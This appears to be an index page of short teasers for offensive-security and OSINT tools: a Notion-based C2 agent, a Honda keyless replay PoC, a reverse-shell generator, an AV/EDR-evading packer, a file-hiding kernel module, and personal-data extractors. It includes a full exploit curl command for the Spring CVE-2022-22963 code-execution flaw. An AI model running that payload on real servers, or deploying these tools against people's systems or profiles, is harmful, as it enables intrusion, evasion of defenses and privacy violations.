OffensiveNotion : Notion As A Platform For Offensive Operations
OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent sends data to and receives commands from your Notion page. Your C2 traffic blends right in as the agent receives instructions and posts results via the Notion developer API. And when your blue team looks for evidence of shenanigans,...
CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System
.png "CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System")
CVE-2022-27254 is a PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254). Summary This is a proof of concept for CVE-2022-27254, wherein the remote keyless system on various Honda vehicles send the same, unencrypted RF signal for each door-open, door-close, boot-open and remote start(if applicable). This allows for an attacker to eavesdrop on the request and conduct a replay attack. Vehicles Affected • 2016-2020 Honda...
CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
.png "CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability")
CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' Or using Burp suite: Download
Casper-Fs : A Custom Hidden Linux Kernel Module Generator
.png "Casper-Fs : A Custom Hidden Linux Kernel Module Generator")
Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even the root has permission to see the files or make actions like edit and remove. The files...
LAZYPARIAH : A Tool For Generating Reverse Shell Payloads On The Fly
.png "LAZYPARIAH : A Tool For Generating Reverse Shell Payloads On The Fly")
LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly. The reverse shell payloads that LAZYPARIAH supports include (but are not limited to): C binary payloads (compiled on the fly): c_binaryRuby payloads: ruby, ruby_b64, ruby_hex, ruby_cPowershell payloads: powershell_c, powershell_b64Base64-encoded Python payloads: python_b64Rust binary payloads...
Socid-Extractor : Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose
Socid-Extractor Extracts information about a user from profile webpages / API responses and save it in machine-readable format. Usage As a command-line tool: $ socid_extractor --url https://www.deviantart.com/muse1908country: Francecreated_at: 2005-06-16 18:17:41gender: femaleusername: Muse1908website: www.patreon.com/musemercierlinks: tagline: Nothing worth having is easy… Without installing: $ ./run.py --url https://www.deviantart.com/muse1908 As a Python library: import socid_extractor, requestsr = requests.get('https://www.patreon.com/annetlovart')socid_extractor.extract(r.text){'patreon_id': '33913189', 'patreon_username': 'annetlovart', 'fullname': 'Annet Lovart', 'links': ""} Installation $ pip3 install socid-extractor The latest...
Gitcolombo : Extract And Analyze Contributors Info From Git Repos
.png "Gitcolombo : Extract And Analyze Contributors Info From Git Repos")
Git colombo is an OSINT tool to extract info about persons from git repositories: common names, emails, matches between different (as it may seems) accounts. Using Install gitRun: from any git url./gitcolombo.py -u https://github.com/Kalanchyovskaia16/newlpsfrom directory, recursively./gitcolombo.py -d ./newlps -rfrom all GitHub personal/org repos by nickname./gitcolombo.py --nickname LubyRuffy For batch cloning from Gitlab and Bitbucket group repos you can use ghorg. Output: verbose persons infonameemailnumber of appearences...
Nimcrypt2 : .NET, PE, And Raw Shellcode Packer/Loader Written In Nim
Nimcrypt2 is yet another PE packer/loader designed to bypass AV/EDR. It is an improvement on my original Nimcrypt project, with the main improvements being the use of direct syscalls and the ability to load regular PE files as well as raw shellcode. Before going any further, I must acknowledge those who did the VAST majority of work and research that this project...
Ostorlab : A Security Scanning Platform That Enables Running Complex Security Scanning Tasks
.png "Ostorlab : A Security Scanning Platform That Enables Running Complex Security Scanning Tasks")
Ostorlab is a Security testing requires often chaining tools together, taking the output from one, mangling it, filtering it and then pushing it to another tool. Several tools have tried to make the process less painful. Ostorlab addresses the same challenge by simplifying the hardest part and automating the boring and tedious part. To do that, Ostorlab focuses on the...
Zkar : A Java Serialization Protocol Analysis Tool Implement In Go
.png "Zkar : A Java Serialization Protocol Analysis Tool Implement In Go")
ZKar is a Java serialization protocol analysis tool implement in Go. This tool is still work in progress, so no complete API document and contribution guide. ZKar provides: A Java serialization payloads parser and viewer in pure Go, no CGO or JDK is requiredFrom the Java serialization protocol to a Go structA Go library that can manipulate the Java serialization dataWIP: ysoserial implement in...
